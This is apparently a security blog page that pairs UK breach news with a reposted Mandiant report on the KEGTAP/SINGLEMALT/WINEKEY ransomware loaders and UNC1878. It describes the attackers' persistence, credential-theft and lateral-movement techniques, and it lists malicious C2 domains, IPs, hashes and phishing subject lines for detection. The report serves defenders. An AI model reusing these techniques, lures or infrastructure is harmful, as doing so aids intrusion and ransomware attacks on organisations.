      It looks like the ransomware will continue to pose a major threat to the UK for some time to come, with separate reports advising a resurgence in the Emotet trojan, a common dropper of ransomware, while the hacking group behind the notorious Ryuk ransomware has been reported as being active again. A new variant of the Ryuk ransomware was behind a cyberattack on Sopra Steria’s operations in October 2020, the digital services company confirmed.

      British Airways had it credit card breach DPA fine cut by a massive £163m to £20m by the UK Information Commissioner's Office (ICO), which imposed the original fine after the now pandemic financially beleaguered airline lost 430,000 payment card details to hackers after an e-commence skimming attack in 2018

       BA lost 430,000 payment card details to hackers after Magecart e-commence skimming attack in 2018
      This data breach was a lesson in failing at PCI DSS compliance, with customer credit card details stolen due to ‘Magecart’ payment card skimming script being injected onto the BA payment page. The attackers initially compromised the BA network through a third-party worker’s remote access (not MFA protected), gaining access to BA's Citrix environment. Once inside the BA network, the attackers were gifted privilege level access after finding a domain admin account username and password in plaintext on a server folder. I understand investigators found the storage of payment cards in plaintext, including CVV numbers post-payment authorisation which is never permitted under PCI DSS rules. Aside from the ICO fine and reputational damage, this breach cost is likely to have cost BA a small fortune in specialised PCI PFI digital investigation forensic work, a complete solution rebuild, and with card brand penalties. The Visa Chief Enterprise Risk Officer once said ‘no compromised entity has yet been found to be in compliance with PCI DSS at the time of a breach’, I understand that statement still rings true today.

      The ICO didn't hold back in dishing a massive DPA (GDPR) fine to the Marriott Hotels chain to the tune of £18.4m after a major data breach which affected up to 7 million UK guests. The ICO reported UK citizen names, contact information, and passport details were compromised in the cyber-attack. The ICO also said the company failed to put appropriate safeguards in place but acknowledged it had improved.

      Meanwhile, the UK NCSC released an advisory which repeated an earlier United States warning that Chinese Threat Actors are exploiting well-known software vulnerabilities. The advisory details 25 top vulnerabilities that are being exploited whilst offering mitigation advice. Many of the vulnerabilities allow attackers to gain access to a victim’s network by exploiting products directly connected to the internet. The NSA has also produced a nice infographic breaking the 25 vulnerabilities down by threat.


      Stay safe and secure.

      BLOG

      NEWS
      AWARENESS, EDUCATION AND THREAT INTELLIGENCE

        Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

        Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

        The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

        The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

        Email Campaign TTPs

        Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

        • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
        • This document contains an in-line link to a URL hosting a malware payload.
        • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
        • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

        Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

        • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
        • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
        • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
        • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


        Figure 1: Email containing internal references to target an organization’s name


        Figure 2: Google Docs PDF document containing a target organization’s logo

        Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

        Post-Compromise TTPs

        Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

        Establish Foothold

        Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

        Maintain Presence

        Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

        • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
          • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
        • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
        • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
        • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
        • In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

        Escalate Privileges

        The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

        • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
        • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
        • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.

        Reconnaissance

        The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Activity Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

        • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
          • Get-GPPPassword
          • Invoke-AllChecks
          • Invoke-BloodHound
          • Invoke-EternalBlue
          • Invoke-FileFinder
          • Invoke-HostRecon
          • Invoke-Inveigh
          • Invoke-Kerberoast
          • Invoke-LoginPrompt
          • Invoke-mimikittenz
          • Invoke-ShareFinder
          • Invoke-UserHunter
        • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfigfindstr, and cmd.exe.
        • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
        • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
        • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt
        • The actors used the Nltest command to list domain controllers.

        Lateral Movement

        Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

        • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
        • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
        • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

        Complete Mission

        Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

        • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
        • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
        • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
        • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

        Hunting Strategies

        If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

        • Isolate and perform a forensic review of any impacted systems.
        • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
        • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
        • Reset credentials for any user accounts associated with execution of the malware.
        • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
        • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc) and move towards multi-factor authentication (MFA) as soon as possible.

        An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

        Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

        %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

        Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

        SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.

        • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
        • Notify state may be set to Fail (Status 2).
        • FileList URL value may be set to the local host or a URL that does not exist.
        • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
        • The Retry Delay value will be set.

        WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

        Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

        Value: Path to the backdoor

        Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

        The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

        • The identification of named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
        • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

        Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

        Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

        The following are additional strategies that may aid in identifying associated activity:

        • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
        • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
        • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.

        Hardening Strategies

        The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

        • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAS for automated rotation.
        • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability for privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins.Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
        • Block internet access for servers where possible. Often times there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
        • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that do not have a business categorization.
        • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

        For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

        Campaign Indicators

        Sample Email Subjects / Patterns

        • <(first|last)-name>: Important Information
        • <Company Name>
        • <Company Name> complaint
        • <(first|last)-name>
        • <(first|last)-name>
        • Agreement cancellation message
        • Agreement cancellation notice
        • Agreement cancellation notification
        • Agreement cancellation reminder
        • Agreement suspension message
        • Agreement suspension notice
        • Agreement suspension notification
        • Agreement suspension reminder
        • Arrangement cancellation message
        • Arrangement cancellation notice
        • Arrangement cancellation notification
        • Arrangement cancellation reminder
        • Arrangement suspension message
        • Arrangement suspension notice
        • Arrangement suspension notification
        • Arrangement suspension reminder
        • Contract cancellation message
        • Contract cancellation notice
        • Contract cancellation notification
        • Contract cancellation reminder
        • Contract suspension message
        • Contract suspension notice
        • Contract suspension notification
        • Contract suspension reminder
        • debit confirmation
        • FW: <Name> Annual Bonus Report is Ready
        • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
        • RE: <(first|last)-name>
        • RE: <(first|last)-name>: Your Payslip for October
        • RE: <Company Name> - my visit
        • RE: <Company Name> Employee Survey
        • RE: <Company Name> office
        • RE: <Name> about complaint
        • RE: <Name> bonus
        • RE: <Name> termination list
        • RE: <Name>
        • RE: <Company Name> office
        • RE: <(first|last)-name>
        • RE: <(first|last)-name> <(first|last)-name>: complaint
        • RE: <(first|last)-name>: Subpoena
        • RE: <(first|last)-name>
        • RE: <(first|last)-name>: Your Payslip for September
        • RE: about complaint
        • RE: Adopted Filer Forms
        • RE: Business hours adjustment
        • RE: Business hours realignment
        • RE: Business hours rearrangement
        • RE: Business hours restructuring
        • RE: Business schedule adjustment
        • RE: Business schedule realignment
        • RE: Business schedule rearrangement
        • RE: Business schedule restructuring
        • RE: call me
        • RE: changes
        • RE: complaint
        • RE: Complaint in <Company Name>.
        • RE: Complaint on <Name>
        • RE: customer request
        • RE: debit confirmation
        • RE: document copy
        • RE: documents list
        • RE: Edgar Filer forms renovations
        • RE: employee bonuses
        • RE: Filer Forms adaptations
        • RE: my call
        • RE: New filer form types
        • RE: office
        • RE: our meeting
        • RE: Payroll Register
        • RE: report confirmation
        • RE: situation
        • RE: Subpoena
        • RE: termination
        • RE: till 2 pm
        • RE: Urgent <Company Name> Employee Internal Survey
        • RE: visit
        • RE: what about your opinion?
        • RE: what time?
        • RE: why
        • RE: why this debit
        • RE: Working schedule adjustment
        • RE: Working schedule realignment
        • RE: Working schedule rearrangement
        • RE: Working schedule restructuring
        • RE: Your Payslip for September

        Example Malware Family MD5s

        • KEGTAP
          • df00d1192451268c31c1f8568d1ff472
        • BEERBOT
          • 6c6a2bfa5846fab374b2b97e65095ec9
        • SINGLEMALT
          • 37aa5690094cb6d638d0f13851be4246
        • STILLBOT
          • 3176c4a2755ae00f4fffe079608c7b25
        • WINEKEY
          • 9301564bdd572b0773f105287d8837c4
        • CORKBOT
          • 0796f1c1ea0a142fc1eb7109a44c86cb

        Code Signing Certificate CNs

        • ARTBUD RADOM SP Z O O
        • BESPOKE SOFTWARE SOLUTIONS LIMITED
        • Best Fud, OOO
        • BlueMarble GmbH
        • CHOO FSP, LLC
        • Company Megacom SP Z O O
        • ESTELLA, OOO
        • EXON RENTAL SP Z O O
        • Geksan LLC
        • GLOBAL PARK HORIZON SP Z O O
        • Infinite Programming Limited
        • James LTH d.o.o.
        • Logika OOO
        • MADAS d.o.o.
        • MUSTER PLUS SP Z O O
        • NEEDCODE SP Z O O
        • Nordkod LLC
        • NOSOV SP Z O O
        • OOO MEP
        • PLAN CORP PTY LTD
        • REGION TOURISM LLC
        • RESURS-RM OOO
        • Retalit LLC
        • Rumikon LLC
        • SNAB-RESURS, OOO
        • TARAT d.o.o.
        • TES LOGISTIKA d.o.o.
        • VAS CO PTY LTD
        • VB CORPORATE PTY. LTD.
        • VITA-DE d.o.o.

        UNC1878 Indicators

        A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

        BEACON C2s

        First Seen

        Domain

        12/11/19

        updatemanagir[.]us

        12/20/19

        cmdupdatewin[.]com

        12/26/19

        scrservallinst[.]info

        1/10/20

        winsystemupdate[.]com

        1/11/20

        jomamba[.]best

        1/13/20

        updatewinlsass[.]com

        1/16/20

        winsysteminfo[.]com

        1/20/20

        livecheckpointsrs[.]com

        1/21/20

        ciscocheckapi[.]com

        1/28/20

        timesshifts[.]com

        1/29/20

        cylenceprotect[.]com

        1/30/20

        sophosdefence[.]com

        1/30/20

        taskshedulewin[.]com

        1/30/20

        windefenceinfo[.]com

        1/30/20

        lsasswininfo[.]com

        1/30/20

        update-wind[.]com

        1/30/20

        lsassupdate[.]com

        1/30/20

        renovatesystem[.]com

        1/31/20

        updatewinsoftr[.]com

        2/2/20

        cleardefencewin[.]com

        2/2/20

        checkwinupdate[.]com

        2/2/20

        havesetup[.]net

        2/3/20

        update-wins[.]com

        2/3/20

        conhostservice[.]com

        2/4/20

        microsoftupdateswin[.]com

        2/4/20

        iexploreservice[.]com

        2/12/20

        avrenew[.]com

        2/12/20

        target-support[.]online

        2/12/20

        web-analysis[.]live

        2/14/20

        freeallsafe[.]com

        2/17/20

        windefens[.]com

        2/17/20

        defenswin[.]com

        2/17/20

        easytus[.]com

        2/17/20

        greattus[.]com

        2/17/20

        livetus[.]com

        2/17/20

        comssite[.]com

        2/17/20

        findtus[.]com

        2/17/20

        bigtus[.]com

        2/17/20

        aaatus[.]com

        2/17/20

        besttus[.]com

        2/17/20

        firsttus[.]com

        2/17/20

        worldtus[.]com

        2/26/20

        freeoldsafe[.]com

        2/26/20

        serviceupdates[.]net

        2/26/20

        topserviceupdater[.]com

        2/27/20

        myserviceupdater[.]com

        2/29/20

        myservicebooster[.]net

        2/29/20

        servicesbooster[.]org

        2/29/20

        brainschampions[.]com

        2/29/20

        myservicebooster[.]com

        2/29/20

        topservicesbooster[.]com

        2/29/20

        servicesbooster[.]com

        2/29/20

        topservicesecurity[.]org

        2/29/20

        topservicesecurity[.]net

        2/29/20

        topsecurityservice[.]net

        2/29/20

        myyserviceupdater[.]com

        2/29/20

        topservicesupdate[.]com

        2/29/20

        topservicesecurity[.]com

        2/29/20

        servicesecurity[.]org

        2/29/20

        myserviceconnect[.]net

        3/2/20

        topservicesupdates[.]com

        3/2/20

        yoursuperservice[.]com

        3/2/20

        topservicehelper[.]com

        3/2/20

        serviceuphelper[.]com

        3/2/20

        serviceshelpers[.]com

        3/2/20

        boostsecuritys[.]com

        3/3/20

        hakunamatatata[.]com

        3/8/20

        service-updater[.]com

        3/9/20

        secondserviceupdater[.]com

        3/9/20

        twelvethserviceupdater[.]com

        3/9/20

        twentiethservicehelper[.]com

        3/9/20

        twelfthservicehelper[.]com

        3/9/20

        tenthservicehelper[.]com

        3/9/20

        thirdserviceupdater[.]com

        3/9/20

        thirdservicehelper[.]com

        3/9/20

        tenthserviceupdater[.]com

        3/9/20

        thirteenthservicehelper[.]com

        3/9/20

        seventeenthservicehelper[.]com

        3/9/20

        sixteenthservicehelper[.]com

        3/9/20

        sixthservicehelper[.]com

        3/9/20

        seventhservicehelper[.]com

        3/9/20

        seventhserviceupdater[.]com

        3/9/20

        sixthserviceupdater[.]com

        3/9/20

        secondservicehelper[.]com

        3/9/20

        ninthservicehelper[.]com

        3/9/20

        ninethserviceupdater[.]com

        3/9/20

        fourteenthservicehelper[.]com

        3/9/20

        fourthserviceupdater[.]com

        3/9/20

        firstserviceupdater[.]com

        3/9/20

        firstservisehelper[.]com

        3/9/20

        fifthserviceupdater[.]com

        3/9/20

        eleventhserviceupdater[.]com

        3/9/20

        fifthservicehelper[.]com

        3/9/20

        fourservicehelper[.]com

        3/9/20

        eighthservicehelper[.]com

        3/9/20

        eighteenthservicehelper[.]com

        3/9/20

        eighthserviceupdater[.]com

        3/9/20

        fifteenthservicehelper[.]com

        3/9/20

        nineteenthservicehelper[.]com

        3/9/20

        eleventhservicehelper[.]com

        3/14/20

        thirdservice-developer[.]com

        3/14/20

        fifthservice-developer[.]com

        3/15/20

        firstservice-developer[.]com

        3/16/20

        fourthservice-developer[.]com

        3/16/20

        ninethservice-developer[.]com

        3/16/20

        seventhservice-developer[.]com

        3/16/20

        secondservice-developer[.]com

        3/16/20

        sixthservice-developer[.]com

        3/16/20

        tenthservice-developer[.]com

        3/16/20

        eithtservice-developer[.]com

        3/17/20

        servicedupdater[.]com

        3/17/20

        service-updateer[.]com

        3/19/20

        sexyservicee[.]com

        3/19/20

        serviceboostnumberone[.]com

        3/19/20

        servicedbooster[.]com

        3/19/20

        service-hunter[.]com

        3/19/20

        servicedhunter[.]com

        3/19/20

        servicedpower[.]com

        3/19/20

        sexycservice[.]com

        3/23/20

        yourserviceupdater[.]com

        3/23/20

        top-serviceupdater[.]com

        3/23/20

        top-servicebooster[.]com

        3/23/20

        serviceshelps[.]com

        3/23/20

        servicemonsterr[.]com

        3/23/20

        servicehunterr[.]com

        3/23/20

        service-helpes[.]com

        3/23/20

        servicecheckerr[.]com

        3/23/20

        newservicehelper[.]com

        3/23/20

        huntersservice[.]com

        3/23/20

        helpforyourservice[.]com

        3/23/20

        boostyourservice[.]com

        3/26/20

        developmasters[.]com

        3/26/20

        actionshunter[.]com

        5/4/20

        info-develop[.]com

        5/4/20

        ayechecker[.]com

        5/4/20

        service-booster[.]com

        9/18/20

        zapored[.]com

        9/22/20

        gtrsqer[.]com

        9/22/20

        chalengges[.]com

        9/22/20

        caonimas[.]com

        9/22/20

        hakunaman[.]com

        9/22/20

        getinformationss[.]com

        9/22/20

        nomadfunclub[.]com

        9/22/20

        harddagger[.]com

        9/22/20

        errvghu[.]com

        9/22/20

        reginds[.]com

        9/22/20

        gameleaderr[.]com

        9/22/20

        razorses[.]com

        9/22/20

        vnuret[.]com

        9/22/20

        regbed[.]com

        9/22/20

        bouths[.]com

        9/23/20

        ayiyas[.]com

        9/23/20

        serviceswork[.]net

        9/23/20

        moonshardd[.]com

        9/23/20

        hurrypotter[.]com

        9/23/20

        biliyilish[.]com

        9/23/20

        blackhoall[.]com

        9/23/20

        checkhunterr[.]com

        9/23/20

        daggerclip[.]com

        9/23/20

        check4list[.]com

        9/24/20

        chainnss[.]com

        9/29/20

        hungrrybaby[.]com

        9/30/20

        martahzz[.]com

        10/1/20

        jonsonsbabyy[.]com

        10/1/20

        wondergodst[.]com

        10/1/20

        zetrexx[.]com

        10/1/20

        tiancaii[.]com

        10/1/20

        cantliee[.]com

        10/1/20

        realgamess[.]com

        10/1/20

        maybebaybe[.]com

        10/1/20

        saynoforbubble[.]com

        10/1/20

        chekingking[.]com

        10/1/20

        rapirasa[.]com

        10/1/20

        raidbossa[.]com

        10/1/20

        mountasd[.]com

        10/1/20

        puckhunterrr[.]com

        10/1/20

        pudgeee[.]com

        10/1/20

        loockfinderrs[.]com

        10/1/20

        lindasak[.]com

        10/1/20

        bithunterr[.]com

        10/1/20

        voiddas[.]com

        10/1/20

        sibalsakie[.]com

        10/1/20

        giveasees[.]com

        10/1/20

        shabihere[.]com

        10/1/20

        tarhungangster[.]com

        10/1/20

        imagodd[.]com

        10/1/20

        raaidboss[.]com

        10/1/20

        sunofgodd[.]com

        10/1/20

        rulemonster[.]com

        10/1/20

        loxliver[.]com

        10/1/20

        servicegungster[.]com

        10/1/20

        kungfupandasa[.]com

        10/2/20

        check1domains[.]com

        10/5/20

        sweetmonsterr[.]com

        10/5/20

        qascker[.]com

        10/7/20

        remotessa[.]com

        10/7/20

        cheapshhot[.]com

        10/7/20

        havemosts[.]com

        10/7/20

        unlockwsa[.]com

        10/7/20

        sobcase[.]com

        10/7/20

        zhameharden[.]com

        10/7/20

        mixunderax[.]com

        10/7/20

        bugsbunnyy[.]com

        10/7/20

        fastbloodhunter[.]com

        10/7/20

        serviceboosterr[.]com

        10/7/20

        servicewikii[.]com

        10/7/20

        secondlivve[.]com

        10/7/20

        quwasd[.]com

        10/7/20

        luckyhunterrs[.]com

        10/7/20

        wodemayaa[.]com

        10/7/20

        hybriqdjs[.]com

        10/7/20

        gunsdrag[.]com

        10/7/20

        gungameon[.]com

        10/7/20

        servicemount[.]com

        10/7/20

        servicesupdater[.]com

        10/7/20

        service-boosterr[.]com

        10/7/20

        serviceupdatter[.]com

        10/7/20

        dotmaingame[.]com

        10/12/20

        backup1service[.]com

        10/13/20

        bakcup-monster[.]com

        10/13/20

        bakcup-checker[.]com

        10/13/20

        backup-simple[.]com

        10/13/20

        backup-leader[.]com

        10/13/20

        backup-helper[.]com

        10/13/20

        service-checker[.]com

        10/13/20

        nasmastrservice[.]com

        10/14/20

        service-leader[.]com

        10/14/20

        nas-simple-helper[.]com

        10/14/20

        nas-leader[.]com

        10/14/20

        boost-servicess[.]com

        10/14/20

        elephantdrrive[.]com

        10/15/20

        service-hellper[.]com

        10/16/20

        top-backuphelper[.]com

        10/16/20

        best-nas[.]com

        10/16/20

        top-backupservice[.]com

        10/16/20

        bestservicehelper[.]com

        10/16/20

        backupnas1[.]com

        10/16/20

        backupmastter[.]com

        10/16/20

        best-backup[.]com

        10/17/20

        viewdrivers[.]com

        10/19/20

        topservicebooster[.]com

        10/19/20

        topservice-masters[.]com

        10/19/20

        topbackupintheworld[.]com

        10/19/20

        topbackup-helper[.]com

        10/19/20

        simple-backupbooster[.]com

        10/19/20

        top3-services[.]com

        10/19/20

        backup1services[.]com

        10/21/20

        backupmaster-service[.]com

        10/21/20

        backupmasterservice[.]com

        10/21/20

        service1updater[.]com

        10/21/20

        driverdwl[.]com

        10/21/20

        backup1master[.]com

        10/21/20

        boost-yourservice[.]com

        10/21/20

        checktodrivers[.]com

        10/21/20

        backup1helper[.]com

        10/21/20

        driver1updater[.]com

        10/21/20

        driver1master[.]com

        10/23/20

        view-backup[.]com

        10/23/20

        top3servicebooster[.]com

        10/23/20

        servicereader[.]com

        10/23/20

        servicehel[.]com

        10/23/20

        driver-boosters[.]com

        10/23/20

        service1update[.]com

        10/23/20

        service-hel[.]com

        10/23/20

        driver1downloads[.]com

        10/23/20

        service1view[.]com

        10/23/20

        backups1helper[.]com

        10/25/20

        idriveview[.]com

        10/26/20

        debug-service[.]com

        10/26/20

        idrivedwn[.]com

        10/28/20

        driverjumper[.]com

        10/28/20

        service1boost[.]com

        10/28/20

        idriveupdate[.]com

        10/28/20

        idrivehepler[.]com

        10/28/20

        idrivefinder[.]com

        10/28/20

        idrivecheck[.]com

        10/28/20

        idrivedownload[.]com

         

        First Seen

        Server

        Subject

        MD5

        12/12/19

        140.82.60.155:443

        CN=updatemanagir[.]us

        ec16be328c09473d5e5c07310583d85a

        12/21/19

        96.30.192.141:443

        CN=cmdupdatewin[.]com

        3d4de17df25412bb714fda069f6eb27e

        1/6/20

        45.76.49.78:443

        CN=scrservallinst[.]info

        cd6035bd51a44b597c1e181576dd44d9

        1/8/20

        149.248.58.11:443

        CN=updatewinlsass[.]com

        8c581979bd11138ffa3a25b895b97cc0

        1/9/20

        96.30.193.57:443

        CN=winsystemupdate[.]com

        e4e732502b9658ea3380847c60b9e0fe

        1/14/20

        95.179.219.169:443

        CN=jomamba[.]best

        80b7001e5a6e4bd6ec79515769b91c8b

        1/16/20

        140.82.27.146:443

        CN=winsysteminfo[.]com

        29e656ba9d5d38a0c17a4f0dd855b37e

